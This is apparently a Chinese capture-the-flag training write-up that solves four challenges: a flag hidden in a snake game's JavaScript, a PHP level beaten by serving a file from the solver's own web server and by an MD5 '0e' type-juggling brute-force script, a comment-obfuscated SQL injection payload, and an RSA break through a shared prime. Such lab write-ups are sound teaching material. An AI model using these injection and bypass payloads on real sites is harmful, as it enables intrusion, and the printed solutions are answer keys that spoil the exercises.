省赛培训班wp

web贪吃蛇

查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
//对话
   if(len <= 60 && len % 10 == 0) {
       var cheer = SAY[len/10-1];
       trace(cheer);
   }
   if(len == 70) {
       trace(anss);
   }

   if(len <= 100 && len > 60) {
       var cheer = SAY[5];
       trace(cheer);
   }

在js里找anss,拼接起来base64解密得到flag
ZzJsVXR0NG9ub1VzX1NuN2E4ZQo=

web1

index.php~有源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
error_reporting(0);
session_start();


if ($_SESSION['level1'] !== 'go') {
  if(!$_GET['a'])
  {
    header('Location: index.php?a=1a');
    die();
  }
  $a=$_GET['a'];

  if (stristr($a, 'input')) {
    die('no no no no ');
  }

  if (stristr($a, 'http')) {
    echo "<br />正确的的道路!碰碰碰!<br />";;
  }

  $a2 = @file_get_contents($a,'r');

  if($a2=="12345")
  {
    echo "离flag又近了一步!";
    $_SESSION['level1'] = 'go';
    header('Location: index.php');
  }
  else
  {
    print "<p class='layui-elem-quote'>
        Tips: 12345,no CRLF。
    </p>";
  }
}else{


    if(!($_POST['b']) and !($_POST['c']))
    {
      echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>
          要通过这一关需要POST参数b和c!
      </p>";
        die();
    }

    $b = $_POST['b'];
    $c = $_POST['c'];

    if (!(is_numeric($b))) {
        echo "<br /> b 出错!<br />";
        die();
    }

    if (!(ctype_upper($c)) || (strlen($c) >= 5)) {
        echo "<br /> c 出错!<br />";
        die();
    }

    echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>";

    $hack = $_GET[h];
    $rep = $_GET[r];

    if ((strlen($hack) >= 6) || (strlen($rep) >= 6)) {
      echo "<br /> h OR r 出错!<br />";
      die();
    }

    $str1 = hash('md5', $b, false);
    $str2 = strtr(hash('md5', $c, false), $hack, $rep);

    echo "<p class='layui-elem-quote'>str1 : $str1</p>";
    echo "<p class='layui-elem-quote'>str2 : $str2</p>";



    if (($str1 == $str2) && !($b === $c) && (strlen($c) === 4)) {
          include('flag.php');
          echo "<p class='layui-elem-quote'>
              $flag
          </p>";
    }

}


?>

第一关需要使$a2=="12345",而题目又禁止php://input伪协议,提示http

在本地开启web服务
python -mSimpleHTTPServer 80
放一个文件内容为12345
构造?a=http://172.16.1.230/1.txt

进入第二关
需要($str1 == $str2) && !($b === $c) && (strlen($c) === 4)才能拿到flag

对参数的限制:

  1. b为数字
  2. c为大写字母且长度为4
  3. h和r长度不超过5
1
2
$str1 = hash('md5', $b, false);
$str2 = strtr(hash('md5', $c, false), $hack, $rep);

这里可以把md5加密的c替换字符,而md5只有0-9a-f

想到php中字符串弱类型,如果字符串值以0e开头,后边都是数字,再与数字比较,就会被解释成0*10^n还是为0,就会被判断相等

构造b=240610708,则md5机密后str1为0exxxx的形式
所以把abcdf替换为00000,则有可能也为0exxxx的形式,则相等

上脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
url="http://172.16.0.223:10025/index.php?h=bcdaf&r=00000"
r=requests.session()
r.get("http://172.16.0.223:10025/index.php?a=http://172.16.1.230/1.txt")
s=r'ABCDEFGHIJKLMNOPQRST'
for i in s:
    for j in s:
        for k in s:
            for l in s :
                    payload=i+j+k+l;
                    print payload
                    a={'b':240610708,'c':payload}
                    print r.post(url,data=a).content
                    if "flag" in r.post(url,data=a).content:
                        print payload
                        break

(本来以为会有”flag{xx}”出现,然鹅并没有,碰巧看到了。。。这里把判断是否出现flag改为页面字符长度是否改变)

web_google

提示的很清楚了,过滤了一些字符,绕过就行
payload :?q=a'Union/*1*/Select/*1*/flag,2,3/*1*/fRom/*1*/flag_is_here%23

rseeyb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from flag import flag
from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long

def gen_arg(i):
    p=getPrime(1024)
    q=getPrime(1024)
    open("log"+str(i)+".txt","w").write(hex(p)+"\n"+hex(q))
    n=p*q
    e=65537
    return n,e,p,q

def bosssay():
    n,e,p,q=gen_arg(0)
    m=bytes_to_long(flag)
    c=pow(m,e,n)
    open("boss.txt","w").write(hex(c)+"\n"+hex(n))
    tigersay(c,p,e)

def tigersay(c,p,e):
    q=getPrime(1024)
    n=p*q
    cc=pow(c,e,n)
    open("tiger.txt", "w").write(hex(cc) + "\n" + hex(n))

def main():
    bosssay()

要求flag,需要解出m
而p,q是随机生成的质数,n也随机,但是在tigersay函数里传入了相同p,并且从文件里能得到两个n

即:

1
2
p1*q1=n1
p1*q2=n2

求最大公约数即可求出p,接着求出n
已知p,q,e即可求出d
得到d就可以得到m,求得flag

求p

1
2
3
4
5
6
7
8
9
10
11
def gcd(a, b):
    if a < b:
        a, b = b, a
    while b != 0:
        temp = a % b
        a = b
        b = temp
    return a
a= int('0x9254d235f837be7093dadd7e89af96c43a919a0198b9e7f378a690fe8c655a42dffdaad9d985de77df36b1a9a192f20af40c4f14b2bd7456c98ee975ec0c92e1350f110545a1de0351e2cb0683a3b80403634fc12d0fd8b39ec70af2b1adbc73290e060d27ebbf3c7ec3934a3d6d0bd6baff1fc4ef1a59e9eb549dbfdfe6197291c2f064955841dab974ac604d4797e7667c2fd7101df03e879a93e5307248be18f01959c8e818fe98bff70fc953418ef17517d96a0b38e35e037f9cd39b6efe801f88720d9b2b4d7299dcc620eca99f8e13da58fbea7fbab2742dd6eb7de46c2951c299eaf3187b554bada1f47b8e899a93527558491610b9f018b8ea5ce921',16)
b= int('0xe543df8c958aa57dbaea1ec39c192e5a8b26a64fbdcb3073ba388bc189fb645afd600b25660361df4261f4d06c96196f891f66d216519fdf3141848b69c335b74c725cca30904b46d66df286241dcb0dc030c8fb461a3e269a167a0eb53edd8b1fb56f74279e3575ac3c097c176e0648ce7ae7094fcb19202770fa47db42e2247a58575e3b15e7883ea46e525a83545866bc56f94459c8973cd8637127ffa1b640832f4b9dd9d5d8f967ccd3cb2fd222b2fcdef0a253dc306b4882e7e3f68a1250eab579a98f818696f99c68baae6cdf0634f718197e47d7f1e0a4f7b251f95958632e53465ed7d414a9ab9df6687b89dd04840a52c3e0bc39d1d1753e52ce6d',16)
print gcd(a,b)

求d

1
2
3
4
5
6
7
8
9
10
import gmpy2

p = 172065274198469189283258716424446639773480626144334666332478217946919793335602221300934660008232589355869707615568396174912658652274737343045515395260992451036815064822752321636897666620519427304650758819067183595079837669597720555459781664173209246049359959646976532109655213507238169247598408455347594122469

q = 107358207355730736936889083588800229444187884634054259953241331748575375310111476765364237880870359959162518892064193664135467809538414994442476728730509181761387417634298093397849594799616939842557971048106559229367803451860384013747556580201683919504103040210551672981061719111972580224275121441431057701773

e = 65537

d = gmpy2.invert(e,(p-1)*(q-1))
print(d)

求m

1
2
3
4
5
6
7
8
9
10
from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long

c=7227205058970917253988697272348629072390742730442079261849578753481528018734243776906928810426466711340893496456684228915781322418699561381615396497213577612459731019244931946960529198136200125770814185660801019344503988528919155161210054032498490653811789195374068721678191531695543450594060714122907514239407158295416162414682815878753567087081549537449887383514261265616895987906117428228003018537805648300967622300154073730197361122372486381575741009333643822321470837038252958232982771343391969736104839542012120480213479803517978736879018055329258472236889803298431730999776160072273717790635931420082199722637

d=9190506549030717721645205476165975712158417357992695314425592798265953098722816456463164481372835090232053278464116605067243715894518126968769488722268194649568809839519390988991663676909516975703254530413358310674133837270112006159784792878019684593975770310326973853269103107142247044945160889006130724582944837573873770180752269571959144161340357150024549558740219011126543123287362749998825055227640689726443364874091297444906252238737394459533134164632385241481222433068249524304622285059459643198031906649202438827609842195056980865745999310153318955309918072652249898298376252462873020768565340722078151516321

n=18472619386119921098063602750766409564120904078720703944719072416731760051248151325131154100954778056447834009406330428335028872249863046284495061718434971255253361051726134062612606955579310986832613388937626927763316852517062213938962644017873276980782373146902376416049107843120328914450438851217407510795607149055956619000499773971192981608276828988640098563504566796588712879216893620371181362602771841009871176509267913418966578678280447335170106267017712501072595986597204652731859164012966111251650153717654643071183402267794648610132185106594057257258857734796205184320940954506572252327466572125289840437537

m = pow(c,d,n)
print long_to_bytes(m)

(比较菜就没写到一个脚本里)